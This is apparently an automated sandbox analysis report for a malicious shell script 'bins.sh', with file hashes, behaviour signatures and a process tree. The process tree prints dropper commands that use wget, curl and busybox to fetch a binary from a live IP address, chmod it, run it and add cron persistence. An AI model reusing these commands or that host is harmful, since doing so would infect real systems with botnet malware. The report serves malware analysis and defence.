Analysis
- max time kernel: 149s
- max time network: 151s
- platform: debian-9_armhf
- resource: debian9-armhf-20240729-en
- resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 26/11/2024, 17:01
Static task
- static1
Behavioral tasks
- behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample bins.sh, resource debian9-armhf-20240729-en
- behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample bins.sh, resource debian9-mipsel-20240418-en
General
- Target: bins.sh
- Size: 10KB
- MD5: 6ba8a8748f75571967562756ca21b71b
- SHA1: 34882ed8e6e9809e322519be0ca0dbeb795757cd
- SHA256: 5afdb5bbac7f5d3c2277c891e250c851aaf1bcb7b5ae535c0b5579caee3a545e
- SHA512: 8a0e52f5a8a86784b50d71711349db2df0c00d16d9853a7a85a1b4a8511e710a50d5c250aa068b021ca81caafc7a2dff94f1ce4fc9a907f167e429b7185cb138
- SSDEEP: 96:TlKrZDjN2CwWm8WaiqKtIaBEgCbjpEF18XPNWmslWaiqKt0fZDjN2CUnaRQgF1KE:5Kr4Wm8WaidtIasJXlWmaWaidtSMU
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid 714, process chmod
- Executes dropped EXE (1 IoCs)
  ioc /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY, pid 715, process cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
- Renames itself (1 IoCs)
  pid 716, process cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  description File opened for modification, ioc /var/spool/cron/crontabs/tmp.0C0p0m, process crontab
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration (1 TTPs, 1 IoCs)
  Checks CPU information, which indicates whether the system is a virtual machine.
  description File opened for reading, ioc /proc/cpuinfo, process curl
- Reads runtime system information
  description File opened for reading, ioc /proc/<pid>/cmdline (repeated for several dozen PIDs; full list omitted), process cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY
  description File opened for reading, ioc /proc/self/auxv, process curl
- Writes file to tmp directory (3 IoCs)
  Malware often drops required files in the /tmp directory.
  description File opened for modification, ioc /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY, process curl
  description File opened for modification, ioc /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY, process busybox
  description File opened for modification, ioc /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY, process wget
Processes
- /tmp/bins.sh: /tmp/bins.sh (PID 655)
  - /bin/rm: /bin/rm bins.sh (PID 657)
  - /usr/bin/wget: wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY (PID 659)
    Writes file to tmp directory
  - /usr/bin/curl: curl -O http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY (PID 686)
    Checks CPU configuration
    Reads runtime system information
    Writes file to tmp directory
  - /bin/busybox: /bin/busybox wget http://216.126.231.240/bins/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY (PID 701)
    Writes file to tmp directory
  - /bin/chmod: chmod 777 cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY (PID 714)
    File and Directory Permissions Modification
  - /tmp/cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY: ./cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY (PID 715)
    Executes dropped EXE
    Renames itself
    Reads runtime system information
    - /bin/sh: sh -c "crontab -l" (PID 717)
      - /usr/bin/crontab: crontab -l (PID 719)
    - /bin/sh: sh -c "crontab -" (PID 721)
      - /usr/bin/crontab: crontab - (PID 722)
        Creates/modifies Cron job
  - /bin/rm: rm cDezLTW4nDNa80FifzZ9xXj7XMbIQqeKbY (PID 738)
  - /usr/bin/wget: wget http://216.126.231.240/bins/G7l76kJ2JX6ltablJ94TRVornmZ5xy4VWS (PID 742)
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 177KB
  MD5: 786d75a158fe731feca3880f436082c0
  SHA1: 79ea2734e43d00cdeabed5586b2c1994d02aef3e
  SHA256: 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
  SHA512: 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
- Filesize: 210B
  MD5: 0319c7021f7a9f152357df696635d67a
  SHA1: 788b20d2211f73bb2420706a691c1156c0489fe7
  SHA256: 44043d7ae359508ca049c79812e5d1077d7dd27721a049b9da285156cf92f9ca
  SHA512: dda14e4ae1f31903fbec37cf13acc6a1c02573400b05ced505b4b197ccc5466e4bb5f0a0fc8061595e14fdedf87c0d6905b6d35a15e81e3767109b15f2e055fe